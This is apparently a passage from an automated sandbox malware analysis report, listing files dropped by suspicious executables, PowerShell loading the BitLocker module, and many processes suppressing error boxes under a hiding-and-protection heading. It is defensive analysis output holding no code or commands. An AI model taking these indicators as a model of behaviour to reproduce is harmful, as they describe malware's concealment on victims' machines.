                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\HRugjdAD.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\zomqzklW.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\hbKlfOQH.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\eRokfvkG.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\NKXFMJFr.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\DWtPcxKJ.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\kJRJIbpu.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\KUhOFMFy.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\zgCYVAKQ.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\YqSdRlZU.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\PHyNhJUm.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\xAiiOWpY.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\oROSeukq.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\ddkcuipI.logJump to dropped file
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeFile created: C:\Users\user\Desktop\TuQMKFja.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\XpVNKoNn.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\MBrWacSF.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\EXjhrjDY.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\dBJtpdQc.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\IECYOtkU.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\yViIeRfn.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\fEwcKMUX.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\OxfxrZpJ.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\EOLhHxkb.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\tahrXlpt.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\krNbnIjL.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\TkxwTWEx.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\RfmVTnPw.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\IwSFjKJP.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\gBXkgMjS.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\XXPuwSTl.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\GQyPcgoW.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\nzLkJbeH.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\MJbpFLtL.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\AQlYVRJc.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\kOfTBNTO.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\HNZYygDR.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\yeGIODyj.logJump to dropped file
                          Source: C:\Windows\TAPI\ZWgKQlTqcrSB.exeFile created: C:\Users\user\Desktop\gSeCuhdU.logJump to dropped file

                          Hooking and other Techniques for Hiding and Protection

                          barindex
                          Loading BitLocker PowerShell Module
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                          Source: C:\Users\user\Desktop\updIMdPUj8.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\BridgeSavesMonitor\hypersurrogateComponentdhcp.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
